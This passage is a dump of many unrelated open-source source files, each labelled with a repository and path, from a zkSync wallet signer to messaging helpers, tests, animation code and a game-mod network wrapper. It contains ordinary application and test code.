final EthSignature ethSignature = ethSigner.signTransaction(withdraw, nonce, token, fee).get();
return new SignedTransaction<>(zkSigner.signWithdraw(withdraw), ethSignature);
}
@SneakyThrows
private SignedTransaction<ForcedExit> buildSignedForcedExitTx(String target,
String tokenIdentifier,
BigInteger fee,
Integer nonce,
TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Tokens tokens = provider.getTokens();
final Token token = tokens.getToken(tokenIdentifier);
final ForcedExit forcedExit = ForcedExit
.builder()
.initiatorAccountId(this.getAccountId())
.target(target)
.token(token.getId())
.nonce(nonce)
.fee(fee.toString())
.timeRange(timeRange)
.build();
final EthSignature ethSignature = ethSigner.signTransaction(forcedExit, nonce, token, fee).get();
return new SignedTransaction<>(zkSigner.signForcedExit(forcedExit), ethSignature);
}
@SneakyThrows
private SignedTransaction<MintNFT> buildSignedMintNFTTx(String to, String contentHash, String tokenIdentifier, BigInteger fee, Integer nonce) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Tokens tokens = provider.getTokens();
final Token token = tokens.getToken(tokenIdentifier);
final MintNFT mintNft = MintNFT
.builder()
.creatorId(this.getAccountId())
.creatorAddress(ethSigner.getAddress())
.contentHash(contentHash)
.recipient(to)
.fee(fee.toString())
.feeToken(token.getId())
.nonce(nonce)
.build();
final EthSignature ethSignature = ethSigner.signTransaction(mintNft, nonce, token, fee).get();
return new SignedTransaction<>(zkSigner.signMintNFT(mintNft), ethSignature);
}
@SneakyThrows
private SignedTransaction<WithdrawNFT> buildSignedWithdrawNFTTx(String to, NFT token, String tokenIdentifier, BigInteger fee, Integer nonce, TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Tokens tokens = provider.getTokens();
final Token feeToken = tokens.getToken(tokenIdentifier);
final WithdrawNFT withdrawNFT = WithdrawNFT
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(to)
.token(token.getId())
.nonce(nonce)
.fee(fee.toString())
.feeToken(feeToken.getId())
.timeRange(timeRange)
.build();
final EthSignature ethSignature = ethSigner.signTransaction(withdrawNFT, nonce, feeToken, fee).get();
return new SignedTransaction<>(zkSigner.signWithdrawNFT(withdrawNFT), ethSignature);
}
@SneakyThrows
private SignedTransaction<Swap> buildSignedSwapTx(Order order1, Order order2, BigInteger amount1, BigInteger amount2, String tokenIdentifier, BigInteger fee, Integer nonce) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Tokens tokens = provider.getTokens();
final Token feeToken = tokens.getToken(tokenIdentifier);
final Swap swap = Swap.builder()
.orders(new Tuple2<>(order1, order2))
.submitterAddress(this.ethSigner.getAddress())
.submitterId(this.getAccountId())
.amounts(new Tuple2<>(amount1, amount2))
.nonce(nonce)
.fee(fee.toString())
.feeToken(feeToken.getId())
.build();
final EthSignature ethSignature = ethSigner.signTransaction(swap, nonce, feeToken, fee).get();
return new SignedTransaction<>(zkSigner.signSwap(swap), ethSignature);
}
private String submitSignedTransaction(ZkSyncTransaction signedTransaction,
EthSignature ethereumSignature,
boolean fastProcessing) {
return provider.submitTx(signedTransaction, ethereumSignature, fastProcessing);
}
private String submitSignedTransaction(ZkSyncTransaction signedTransaction,
EthSignature ...ethereumSignature) {
if (ethereumSignature == null || ethereumSignature.length == 0) {
return provider.submitTx(signedTransaction, null, false);
} else if (ethereumSignature.length == 1) {
return provider.submitTx(signedTransaction, ethereumSignature[0], false);
} else {
return provider.submitTx(signedTransaction, ethereumSignature);
}
}
private List<String> submitSignedBatch(List<ZkSyncTransaction> transactions, EthSignature ethereumSignature) {
return provider.submitTxBatch(
transactions.stream().map(tx -> Pair.of(tx, (EthSignature) null)).collect(Collectors.toList()),
ethereumSignature
);
}
private Integer getNonce() {
return getState().getCommitted().getNonce();
}
private void loadAccountInfo() {
final AccountState state = getState();
this.accountId = state.getId();
this.pubKeyHash = state.getCommitted().getPubKeyHash();
}
@Override
public <T extends ZkSyncTransaction> String submitTransaction(SignedTransaction<T> transaction) {
return submitSignedTransaction(transaction.getTransaction(), transaction.getEthereumSignature());
}
}
|
AK403/WXFloatWeb
|
WXFloatSDK/WXFloatSDK/Transition/WXFloatPopTransition.h
|
//
// WXFloatPopTransition.h
// WXFloatSDK
//
// Created by AK403 on 2018/8/24.
// Copyright © 2018年 AK403. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <UIKit/UIKit.h>
@interface WXFloatPopTransition : NSObject<UIViewControllerAnimatedTransitioning>
@property(nonatomic, assign)BOOL isInteracting;
@property (nonatomic, weak) UIViewController* animatedTransitionRespondViewController;
@end
|
open-garden/garden
|
Zipc_Webplatform/src/com/zipc/garden/webplatform/client/editor/ace/Autocomplete.java
|
package com.zipc.garden.webplatform.client.editor.ace;
import jsinterop.annotations.JsPackage;
import jsinterop.annotations.JsType;
/**
* It is a class for interoperating Java and Ace.js. {@link Ace}<br>
* Manage the auto-complete function of Ace.js.
*/
@JsType(isNative = true, namespace = JsPackage.GLOBAL, name = "Autocomplete")
public class Autocomplete {
public native JsObject getPopup();
public native void showPopup(Editor editor);
public native void cancelContextMenu();
public native void detach();
}
|
arve0/es6-transpiler
|
tests/xdollarzero-out.js
|
<reponame>arve0/es6-transpiler<filename>tests/xdollarzero-out.js
"use strict";
var x$0;
var x;
{ var x$1 = void 0; }
|
zhangpf/fuchsia-rs
|
zircon/system/utest/spawn/launcher.c
|
<gh_stars>1-10
// Copyright 2018 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include <launchpad/launchpad.h>
#include <zircon/syscalls.h>
#include <string.h>
int main(int argc, const char* const* argv) {
launchpad_t* lp = NULL;
launchpad_create(ZX_HANDLE_INVALID, "launcher-child", &lp);
launchpad_load_from_file(lp, argv[1]);
launchpad_set_args(lp, argc - 1, argv + 1);
launchpad_clone(lp, LP_CLONE_ALL);
zx_handle_t process = ZX_HANDLE_INVALID;
zx_status_t status = launchpad_go(lp, &process, NULL);
if (status != ZX_OK)
return 401;
status = zx_object_wait_one(process, ZX_TASK_TERMINATED, ZX_TIME_INFINITE, NULL);
if (status != ZX_OK)
return status;
zx_info_process_t proc_info;
memset(&proc_info, 0, sizeof(proc_info));
status = zx_object_get_info(process, ZX_INFO_PROCESS, &proc_info, sizeof(proc_info), NULL, NULL);
if (status != ZX_OK)
return status;
return proc_info.return_code;
}
|
veriktig/scandium
|
old-external/felix/osgi-r7/scr/src/main/java/org/apache/felix/scr/impl/ComponentActorThread.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.felix.scr.impl;
import java.util.LinkedList;
import org.apache.felix.scr.impl.logger.ScrLogger;
import org.osgi.service.log.LogService;
/**
* The <code>ComponentActorThread</code> is the thread used to act upon registered
* components of the service component runtime.
*/
class ComponentActorThread implements Runnable
{
// sentinel task to terminate this thread
private static final Runnable TERMINATION_TASK = new Runnable()
{
@Override
public void run()
{
}
@Override
public String toString()
{
return "Component Actor Terminator";
}
};
// the queue of Runnable instances to be run
private final LinkedList<Runnable> tasks = new LinkedList<>();
private final ScrLogger logger;
ComponentActorThread( final ScrLogger log )
{
logger = log;
}
// waits on Runnable instances coming into the queue. As instances come
// in, this method calls the Runnable.run method, logs any exception
// happening and keeps on waiting for the next Runnable. If the Runnable
// taken from the queue is this thread instance itself, the thread
// terminates.
@Override
public void run()
{
logger.log( LogService.LOG_DEBUG, "Starting ComponentActorThread", null );
for ( ;; )
{
final Runnable task;
synchronized ( tasks )
{
while ( tasks.isEmpty() )
{
boolean interrupted = Thread.interrupted();
try
{
tasks.wait();
}
catch ( InterruptedException ie )
{
interrupted = true;
// don't care
}
finally
{
if (interrupted)
{ // restore interrupt status
Thread.currentThread().interrupt();
}
}
}
task = tasks.removeFirst();
}
try
{
// return if the task is this thread itself
if ( task == TERMINATION_TASK )
{
logger.log( LogService.LOG_DEBUG, "Shutting down ComponentActorThread", null );
return;
}
// otherwise execute the task, log any issues
logger.log( LogService.LOG_DEBUG, "Running task: " + task, null );
task.run();
}
catch ( Throwable t )
{
logger.log( LogService.LOG_ERROR, "Unexpected problem executing task " + task, t );
}
finally
{
synchronized ( tasks )
{
tasks.notifyAll();
}
}
}
}
// cause this thread to terminate by adding this thread to the end
// of the queue
void terminate()
{
schedule( TERMINATION_TASK );
synchronized ( tasks )
{
while ( !tasks.isEmpty() )
{
boolean interrupted = Thread.interrupted();
try
{
tasks.wait();
}
catch ( InterruptedException e )
{
interrupted = true;
logger.log(LogService.LOG_ERROR,
"Interrupted exception waiting for queue to empty", e);
}
finally
{
if (interrupted)
{ // restore interrupt status
Thread.currentThread().interrupt();
}
}
}
}
}
// queue the given runnable to be run as soon as possible
void schedule( Runnable task )
{
synchronized ( tasks )
{
// append to the task queue
tasks.add( task );
logger.log( LogService.LOG_DEBUG, "Adding task [{0}] as #{1} in the queue", null,
task, tasks.size(), null );
// notify the waiting thread
tasks.notifyAll();
}
}
}
|
husirb/cabloy
|
src/module/test-flow/backend/src/controller/flow.js
|
module.exports = app => {
class FlowController extends app.Controller {
async start() {
// start
await this.ctx.bean.flow.startByKey({
flowDefKey: this.ctx.request.body.flowDefKey,
flowVars: this.ctx.request.body.flowVars,
flowUserId: this.ctx.state.user.op.id,
});
this.ctx.success();
}
}
return FlowController;
};
|
goldylucks/zenwallet
|
app/components/AppUpdater/__tests__/appUpdate.spec.js
|
import { get } from 'axios'
import { checkForUpdates, LATEST_RELEASE_URL } from '../appUpdate'
jest.mock('axios', () => ({
get: jest.fn(),
}))
jest.spyOn(global.console, 'error').mockImplementation(() => {})
jest.mock('../../../../package.json', () => ({
version: '1.2.2',
}))
afterEach(() => {
get.mockReset()
})
describe('checkForUpdates', () => {
describe('when api returns assets with same version', () => {
beforeEach(() => {
const testPayload = {
data: {
tag_name: 'v1.2.2',
assets: [
{ browser_download_url: 'test.dmg' },
{ browser_download_url: 'test.exe' },
{ browser_download_url: 'test.tar.gz' },
],
},
}
get.mockReturnValue(testPayload)
})
it('returns undefined', async () => {
const updateLink = await checkForUpdates('darwin')
expect(updateLink).toEqual(undefined)
})
})
describe('when api returns assets with greater version', () => {
beforeEach(() => {
const testPayload = {
data: {
tag_name: 'v1.2.3',
assets: [
{ browser_download_url: 'test.dmg' },
{ browser_download_url: 'test.exe' },
{ browser_download_url: 'test.tar.gz' },
],
},
}
get.mockReturnValue(testPayload)
})
it('returns test.dmg for mac', async () => {
const updateLink = await checkForUpdates('darwin')
expect(updateLink).toEqual('test.dmg')
})
it('returns test.exe for windows', async () => {
const updateLink = await checkForUpdates('win32')
expect(updateLink).toEqual('test.exe')
})
it('returns test.tar.gx for linux', async () => {
const updateLink = await checkForUpdates('linux')
expect(updateLink).toEqual('test.tar.gz')
})
it('returns the release url for unknown os', async () => {
const updateLink = await checkForUpdates('freebsd')
expect(updateLink).toEqual(LATEST_RELEASE_URL)
})
})
describe('when api throws error', () => {
beforeEach(() => {
get.mockReturnValue(Promise.reject(new Error()))
})
it('returns undefined', async () => {
const updateLink = await checkForUpdates('freebsd')
expect(updateLink).toEqual(undefined)
})
})
})
|
nobejs/files
|
core/utils/rabbitSendMessage.js
|
const amqp = require("amqplib");
const rabbitSendMessage = (amqp_endpoint, q, message) => {
return new Promise(async (resolve, reject) => {
var conn;
try {
conn = await amqp.connect(amqp_endpoint);
const ch = await conn.createChannel();
var assertOk = await ch.assertQueue(q, { durable: true });
var ok = await ch.sendToQueue(q, Buffer.from(message), {
persistent: true,
});
setTimeout(function () {
conn.close();
resolve();
}, 500);
} catch (error) {
console.log("error", error);
reject(error);
}
});
};
module.exports = rabbitSendMessage;
|
homersoft/aio-pika
|
tests/test_amqp_robust.py
|
<filename>tests/test_amqp_robust.py
import asyncio
import time
from functools import partial
import pytest
import aio_pika
from aio_pika import RobustChannel
from tests.test_amqp import (
TestCaseAmqp, TestCaseAmqpNoConfirms, TestCaseAmqpWithConfirms,
)
@pytest.fixture
def connection_fabric():
return aio_pika.connect_robust
@pytest.fixture
def create_connection(connection_fabric, loop, amqp_url):
return partial(connection_fabric, amqp_url, loop=loop)
class TestCaseNoRobust(TestCaseAmqp):
PARAMS = [{"robust": True}, {"robust": False}]
IDS = ["robust=1", "robust=0"]
@staticmethod
@pytest.fixture(name="declare_queue", params=PARAMS, ids=IDS)
def declare_queue_(request, declare_queue):
async def fabric(*args, **kwargs) -> aio_pika.Queue:
kwargs.update(request.param)
return await declare_queue(*args, **kwargs)
return fabric
@staticmethod
@pytest.fixture(name="declare_exchange", params=PARAMS, ids=IDS)
def declare_exchange_(request, declare_exchange):
async def fabric(*args, **kwargs) -> aio_pika.Queue:
kwargs.update(request.param)
return await declare_exchange(*args, **kwargs)
return fabric
async def test_add_reconnect_callback(self, create_connection):
connection = await create_connection()
def cb(*a, **kw):
pass
connection.reconnect_callbacks.add(cb)
del cb
assert len(connection.reconnect_callbacks) == 1
async def test_channel_blocking_timeout_reopen(self, connection):
channel: RobustChannel = await connection.channel() # type: ignore
close_reasons = []
close_event = asyncio.Event()
reopen_event = asyncio.Event()
channel.reopen_callbacks.add(lambda _: reopen_event.set())
def on_done(*args):
close_reasons.append(args)
close_event.set()
return
channel.close_callbacks.add(on_done)
async def run(sleep_time=1):
await channel.set_qos(1)
if sleep_time:
time.sleep(sleep_time)
await channel.set_qos(0)
with pytest.raises(asyncio.TimeoutError):
await asyncio.wait_for(run(), timeout=0.2)
await close_event.wait()
with pytest.raises(RuntimeError):
await channel.channel.closing
assert channel.is_closed
# Ensure close callback has been called
assert close_reasons
await asyncio.wait_for(reopen_event.wait(), timeout=2)
await asyncio.wait_for(run(sleep_time=0), timeout=2)
class TestCaseAmqpNoConfirmsRobust(TestCaseAmqpNoConfirms):
pass
class TestCaseAmqpWithConfirmsRobust(TestCaseAmqpWithConfirms):
pass
|
alamlam1982/fincpp
|
Chapter14/ShapePatterns/13_Proxy/RealAccount.cpp
|
<reponame>alamlam1982/fincpp<gh_stars>0
// RealAccount.cpp
//
// (C) Datasim Education BV 2002
#include "RealAccount.hpp"
// Constructors and destructor
RealAccount::RealAccount(): Account()
{ // Default constructor
bal=0.0;
}
RealAccount::RealAccount(double balance): Account()
{ // Constructor with initial balance
bal=balance;
}
RealAccount::RealAccount(const RealAccount& source): Account(source)
{ // Copy constructor
bal=source.bal;
}
RealAccount:: ~RealAccount()
{ // Destructor
}
// Virtual functions to be define in derived classes
void RealAccount::Withdraw(double amount)
{ // Withdraw some money
if (amount>bal) throw NoFundsException();
else bal-=amount;
}
double RealAccount::GetBalance()
{ // Return the balance
return bal;
}
// Operator overloading
RealAccount& RealAccount::operator = (const RealAccount& source)
{ // Assignment operator
// Call base class assignment
Account::operator = (source);
bal=source.bal;
return *this;
}
|
Montana-Media-Arts/120_CreativeCoding
|
lecture_code/09/06_2d_array_01/sketch.js
|
<gh_stars>100-1000
// define locations of a star
let starArr = [
[0, -9],
[7, 9],
[-9, -2],
[9, -2],
[-7, 9]
];
let idx = 0;
function setup() {
createCanvas(windowWidth, 500);
background(18, 82, 189);
frameRate(2);
}
function draw() {
translate( width/2, height/2 );
// create a modulus wrapped plus-one idx
let idxPlus = (idx + 1) % starArr.length;
// grab the 2 points defining a line
let x1 = starArr[idx][0] * 10;
let y1 = starArr[idx][1] * 10;
let x2 = starArr[idxPlus][0] * 10;
let y2 = starArr[idxPlus][1] * 10;
// draw the line
strokeWeight(18);
stroke(random(255), random(255), random(255), 150);
line(x1, y1, x2, y2);
// increment the idx
idx = (idx + 1) % starArr.length;
}
|
Wultyc/ISEP_1718_2A2S_REDSI_TrabalhoGrupo
|
REDSI_1160929_1161573/boost_1_67_0/libs/test/doc/examples/dataset_example61.run.cpp
|
// (C) Copyright <NAME> 2014.
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
// See http://www.boost.org/libs/test for the library home page.
//[example_code
#define BOOST_TEST_MODULE dataset_example61
#include <boost/test/included/unit_test.hpp>
#include <boost/test/data/test_case.hpp>
#include <boost/test/data/monomorphic.hpp>
namespace data = boost::unit_test::data;
int samples1[] = {1,2};
char const* samples2[] = {"qwerty", "asdfg"};
BOOST_DATA_TEST_CASE(
test1,
data::make(samples1)^samples2,
integer_values,
string_value)
{
std::cout << integer_values << ", " << string_value << std::endl;
}
//]
|
TheWeatherCompany/geomesa
|
geomesa-kafka/geomesa-kafka-datastore/geomesa-kafka-08-datastore/src/test/scala/org/locationtech/geomesa/kafka08/KafkaDataStoreTest.scala
|
<filename>geomesa-kafka/geomesa-kafka-datastore/geomesa-kafka-08-datastore/src/test/scala/org/locationtech/geomesa/kafka08/KafkaDataStoreTest.scala<gh_stars>0
/***********************************************************************
* Copyright (c) 2013-2016 Commonwealth Computer Research, Inc.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Apache License, Version 2.0
* which accompanies this distribution and is available at
* http://www.opensource.org/licenses/apache2.0.php.
*************************************************************************/
package org.locationtech.geomesa.kafka08
import com.typesafe.scalalogging.LazyLogging
import com.vividsolutions.jts.geom.Coordinate
import org.geotools.data._
import org.geotools.data.simple.SimpleFeatureStore
import org.geotools.factory.Hints
import org.geotools.filter.text.ecql.ECQL
import org.geotools.geometry.jts.JTSFactoryFinder
import org.joda.time.DateTime
import org.junit.runner.RunWith
import org.locationtech.geomesa.kafka.{KafkaDataStoreHelper, ReplayConfig}
import org.locationtech.geomesa.kafka.ReplayTimeHelper.ff
import org.locationtech.geomesa.utils.geotools.SimpleFeatureTypes
import org.opengis.filter.Filter
import org.specs2.mutable.Specification
import org.specs2.runner.JUnitRunner
import scala.collection.JavaConversions._
@RunWith(classOf[JUnitRunner])
class KafkaDataStoreTest extends Specification with HasEmbeddedKafka with LazyLogging {
sequential // this doesn't really need to be sequential, but we're trying to reduce zk load
// skip embedded kafka tests unless explicitly enabled, they often fail randomly
skipAllUnless(sys.props.get(SYS_PROP_RUN_TESTS).exists(_.toBoolean))
val gf = JTSFactoryFinder.getGeometryFactory
val zkPath = "/geomesa/kafka/testds"
val producerParams = Map(
"brokers" -> brokerConnect,
"zookeepers" -> zkConnect,
"zkPath" -> zkPath,
"isProducer" -> true)
"KafkaDataSource" should {
import org.locationtech.geomesa.security._
val consumerParams = Map(
"brokers" -> brokerConnect,
"zookeepers" -> zkConnect,
"zkPath" -> zkPath,
"isProducer" -> false)
val consumerDS = DataStoreFinder.getDataStore(consumerParams)
val producerDS = DataStoreFinder.getDataStore(producerParams)
"consumerDS must not be null" >> { consumerDS must not(beNull) }
"producerDS must not be null" >> { producerDS must not(beNull) }
val schema = {
val sft = SimpleFeatureTypes.createType("test", "name:String,age:Int,dtg:Date,*geom:Point:srid=4326")
KafkaDataStoreHelper.createStreamingSFT(sft, zkPath)
}
"allow schemas to be created and be available in other data stores" >> {
producerDS.createSchema(schema)
consumerDS.getTypeNames.toList must contain("test")
}
//todo: This test fails.
"allow schemas to be created with user-data and be available in other data stores" >> {
val schemaWithMetadata = {
val sft = SimpleFeatureTypes.createType("user-data",
"name:String,age:Int,dtg:Date,*geom:Point:srid=4326;geomesa.foo='bar'")
KafkaDataStoreHelper.createStreamingSFT(sft, zkPath)
}
producerDS.createSchema(schemaWithMetadata)
consumerDS.getTypeNames.toList must contain("user-data")
val retrieved = consumerDS.getSchema("user-data")
retrieved must not(beNull)
retrieved.getUserData.get("geomesa.foo") mustEqual "bar"
}.pendingUntilFixed("producerDs has the userData, but consumerDs doesn't. Not seeing in code where sft/usrData is written to zookeeper.")
"allow schemas to be deleted" >> {
val replaySFT = KafkaDataStoreHelper.createReplaySFT(schema, ReplayConfig(10000L, 20000L, 1000L))
val name = replaySFT.getTypeName
consumerDS.createSchema(replaySFT)
consumerDS.getTypeNames.toList must contain(name)
consumerDS.removeSchema(name)
consumerDS.getTypeNames.toList must not(contain(name))
}
lazy val (sf, store, fw, consumerFC) = {
// create the consumerFC first so that it is ready to receive features from the producer
val conFC = consumerDS.getFeatureSource("test")
val str = producerDS.getFeatureSource("test").asInstanceOf[SimpleFeatureStore]
val fWriter = producerDS.getFeatureWriter("test", null, Transaction.AUTO_COMMIT)
val sFeature = fWriter.next()
sFeature.setAttributes(Array("smith", 30, DateTime.now().toDate).asInstanceOf[Array[AnyRef]])
sFeature.setDefaultGeometry(gf.createPoint(new Coordinate(0.0, 0.0)))
sFeature.visibility = "USER|ADMIN"
fWriter.write()
Thread.sleep(2000)
(sFeature, str, fWriter, conFC)
}
"read" >> {
val features = consumerFC.getFeatures.features()
features.hasNext must beTrue
val readSF = features.next()
sf.getID must be equalTo readSF.getID
sf.getAttribute("dtg") must be equalTo readSF.getAttribute("dtg")
sf.visibility mustEqual Some("USER|ADMIN")
store.removeFeatures(ff.id(ff.featureId(sf.getID)))
Thread.sleep(500) // ensure FC has seen the delete
consumerFC.getCount(Query.ALL) must be equalTo 0
}
"updated" >> {
val updated = sf
updated.setAttribute("name", "jones")
updated.getUserData.put(Hints.USE_PROVIDED_FID, java.lang.Boolean.TRUE)
updated.visibility = "ADMIN"
store.addFeatures(DataUtilities.collection(updated))
Thread.sleep(500)
val q = ff.id(updated.getIdentifier)
val featureCollection = consumerFC.getFeatures(q)
featureCollection.size() must be equalTo 1
val res = featureCollection.features().next()
res.getAttribute("name") must be equalTo "jones"
res.visibility mustEqual Some("ADMIN")
}
"cleared" >> {
store.removeFeatures(Filter.INCLUDE)
Thread.sleep(500)
consumerFC.getCount(Query.ALL) must be equalTo 0
val sf = fw.next()
sf.setAttributes(Array("smith", 30, DateTime.now().toDate).asInstanceOf[Array[AnyRef]])
sf.setDefaultGeometry(gf.createPoint(new Coordinate(0.0, 0.0)))
fw.write()
Thread.sleep(500)
consumerFC.getCount(Query.ALL) must be equalTo 1
}
"queried with cql" >> {
val sf = fw.next()
sf.setAttributes(Array("jones", 60, DateTime.now().toDate).asInstanceOf[Array[AnyRef]])
sf.setDefaultGeometry(gf.createPoint(new Coordinate(0.0, 0.0)))
sf.visibility = "USER"
fw.write()
Thread.sleep(500)
var res = consumerFC.getFeatures(ff.equals(ff.property("name"), ff.literal("jones")))
res.size() must be equalTo 1
val resSF = res.features().next()
resSF.getAttribute("name") must be equalTo "jones"
resSF.visibility mustEqual Some("USER")
res = consumerFC.getFeatures(ff.greater(ff.property("age"), ff.literal(50)))
res.size() must be equalTo 1
res.features().next().getAttribute("name") must be equalTo "jones"
// bbox and cql
val spatialQ = ff.bbox("geom", -10, -10, 10, 10, "EPSG:4326")
val attrQ = ff.greater(ff.property("age"), ff.literal(50))
res = consumerFC.getFeatures(ff.and(spatialQ, attrQ))
res.size() must be equalTo 1
res.features().next().getAttribute("name") must be equalTo "jones"
val mixedQ = ECQL.toFilter("age = 60 AND INTERSECTS(geom, POLYGON((-10 -10, 10 -10, 10 10, -10 10, -10 -10))) " +
"AND bbox(geom, -10, -10, 10, 10)")
res = consumerFC.getFeatures(mixedQ)
res.size() must be equalTo 1
res.features().next().getAttribute("name") must be equalTo "jones"
val mixedQ2 = ECQL.toFilter("bbox(geom, -10, -10, 10, 10) AND age = 60 AND " +
"INTERSECTS(geom, POLYGON((-10 -10, 10 -10, 10 10, -10 10, -10 -10)))")
res = consumerFC.getFeatures(mixedQ2)
res.size() must be equalTo 1
res.features().next().getAttribute("name") must be equalTo "jones"
val mixedQ3 = ECQL.toFilter("bbox(geom, -150, -10, 31, 10) AND age = 60 AND " +
"INTERSECTS(geom, POLYGON((-10 -10, 10 -10, 10 10, -10 10, -10 -10)))")
res = consumerFC.getFeatures(mixedQ3)
res.size() must be equalTo 1
res.features().next().getAttribute("name") must be equalTo "jones"
val mixedQ4 = ECQL.toFilter("name in ('jones') AND " +
"INTERSECTS(geom, POLYGON((-180 -90, -180 90, 180 90, 180 -90, -180 -90))) AND " +
"bbox(geom, -10, -10, 10, 10)"
)
res = consumerFC.getFeatures(mixedQ4)
res.size() must be equalTo 1
res.features().next().getAttribute("name") must be equalTo "jones"
}
"allow for calls to getFeatureWriterAppend" >> {
producerDS.getFeatureWriterAppend(schema.getTypeName, Transaction.AUTO_COMMIT) must not(beNull)
}
"return correctly from canProcess" >> {
import KafkaDataStoreFactoryParams._
val factory = new KafkaDataStoreFactory
factory.canProcess(Map.empty[String, Serializable]) must beFalse
factory.canProcess(Map(KAFKA_BROKER_PARAM.key -> "test", ZOOKEEPERS_PARAM.key -> "test")) must beTrue
}
}
step {
shutdown()
}
}
|
jriwanek/Mantle
|
src/main/java/slimeknights/mantle/network/NetworkWrapper.java
|
package slimeknights.mantle.network;
import net.minecraftforge.fml.common.network.NetworkRegistry;
import net.minecraftforge.fml.common.network.simpleimpl.IMessage;
import net.minecraftforge.fml.common.network.simpleimpl.IMessageHandler;
import net.minecraftforge.fml.common.network.simpleimpl.MessageContext;
import net.minecraftforge.fml.common.network.simpleimpl.SimpleNetworkWrapper;
import net.minecraftforge.fml.relauncher.Side;
/**
* A small network implementation/wrapper using AbstractPackets instead of IMessages.
* Instantiate in your mod class and register your packets accordingly.
*/
public class NetworkWrapper {
public final SimpleNetworkWrapper network;
protected final AbstactPacketHandler handler;
private int id = 0;
public NetworkWrapper(String channelName) {
network = NetworkRegistry.INSTANCE.newSimpleChannel(channelName);
handler = new AbstactPacketHandler();
}
/**
* Packet will be received on both client and server side.
*/
public void registerPacket(Class<? extends AbstractPacket> packetClazz) {
registerPacketClient(packetClazz);
registerPacketServer(packetClazz);
}
/**
* Packet will only be received on the client side
*/
public void registerPacketClient(Class<? extends AbstractPacket> packetClazz) {
registerPacketImpl(packetClazz, Side.CLIENT);
}
/**
* Packet will only be received on the server side
*/
public void registerPacketServer(Class<? extends AbstractPacket> packetClazz) {
registerPacketImpl(packetClazz, Side.SERVER);
}
private void registerPacketImpl(Class<? extends AbstractPacket> packetClazz, Side side) {
network.registerMessage(handler, packetClazz, id++, side);
}
public static class AbstactPacketHandler implements IMessageHandler<AbstractPacket, IMessage> {
@Override
public IMessage onMessage(AbstractPacket packet, MessageContext ctx) {
if(ctx.side == Side.SERVER) {
return packet.handleServer(ctx.getServerHandler());
}
else {
return packet.handleClient(ctx.getClientHandler());
}
}
}
}
|
LiveTyping/CannyViewAnimator
|
library/src/main/java/com/livetyping/library/animators/reveal/RevealAnimators.java
|
<reponame>LiveTyping/CannyViewAnimator<gh_stars>100-1000
package com.livetyping.library.animators.reveal;
import android.animation.Animator;
import android.annotation.SuppressLint;
import android.annotation.TargetApi;
import android.os.Build;
import android.view.Gravity;
import android.view.View;
import com.livetyping.library.interfaces.DefaultCannyAnimators;
import com.livetyping.library.interfaces.InAnimator;
import com.livetyping.library.interfaces.OutAnimator;
/**
* Created by Danil on 09.05.2016.
*/
@SuppressLint("RtlHardcoded")
@TargetApi(Build.VERSION_CODES.LOLLIPOP)
public enum RevealAnimators implements DefaultCannyAnimators {
CIRCULAR_REVEAL_TOP_CENTER(new RevealIn(Gravity.TOP | Gravity.CENTER_HORIZONTAL),
new RevealOut(Gravity.TOP | Gravity.CENTER_HORIZONTAL)),
CIRCULAR_REVEAL_TOP_LEFT(new RevealIn(Gravity.TOP | Gravity.LEFT),
new RevealOut(Gravity.TOP | Gravity.LEFT)),
CIRCULAR_REVEAL_TOP_RIGHT(new RevealIn(Gravity.TOP | Gravity.RIGHT),
new RevealOut(Gravity.TOP | Gravity.RIGHT)),
CIRCULAR_REVEAL_BOTTOM_CENTER(new RevealIn(Gravity.BOTTOM | Gravity.CENTER_HORIZONTAL),
new RevealOut(Gravity.BOTTOM | Gravity.CENTER_HORIZONTAL)),
CIRCULAR_REVEAL_BOTTOM_LEFT(new RevealIn(Gravity.BOTTOM | Gravity.LEFT),
new RevealOut(Gravity.BOTTOM | Gravity.LEFT)),
CIRCULAR_REVEAL_BOTTOM_RIGHT(new RevealIn(Gravity.BOTTOM | Gravity.RIGHT),
new RevealOut(Gravity.BOTTOM | Gravity.RIGHT)),
CIRCULAR_REVEAL_CENTER_LEFT(new RevealIn(Gravity.LEFT | Gravity.CENTER_VERTICAL),
new RevealOut(Gravity.LEFT | Gravity.CENTER_VERTICAL)),
CIRCULAR_REVEAL_CENTER_RIGHT(new RevealIn(Gravity.RIGHT | Gravity.CENTER_VERTICAL),
new RevealOut(Gravity.RIGHT | Gravity.CENTER_VERTICAL)),
CIRCULAR_REVEAL_CENTER(new RevealIn(Gravity.CENTER),
new RevealOut(Gravity.CENTER));
private InAnimator inAnimator;
private OutAnimator outAnimator;
RevealAnimators(InAnimator inAnimator,
OutAnimator outAnimator) {
this.inAnimator = inAnimator;
this.outAnimator = outAnimator;
}
@Override
public String getName() {
return name();
}
@Override
public Animator getInAnimator(View inChild, View outChild) {
return inAnimator.getInAnimator(inChild, outChild);
}
@Override
public Animator getOutAnimator(View inChild, View outChild) {
return outAnimator.getOutAnimator(inChild, outChild);
}
}
|
krattai/AEBL
|
blades/gnunet/src/nse/gnunet-nse.c
|
/*
This file is part of GNUnet
Copyright (C) 2008--2014, 2016 GNUnet e.V.
GNUnet is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 3, or (at your
option) any later version.
GNUnet is distributed in the hope that it will be useful, but
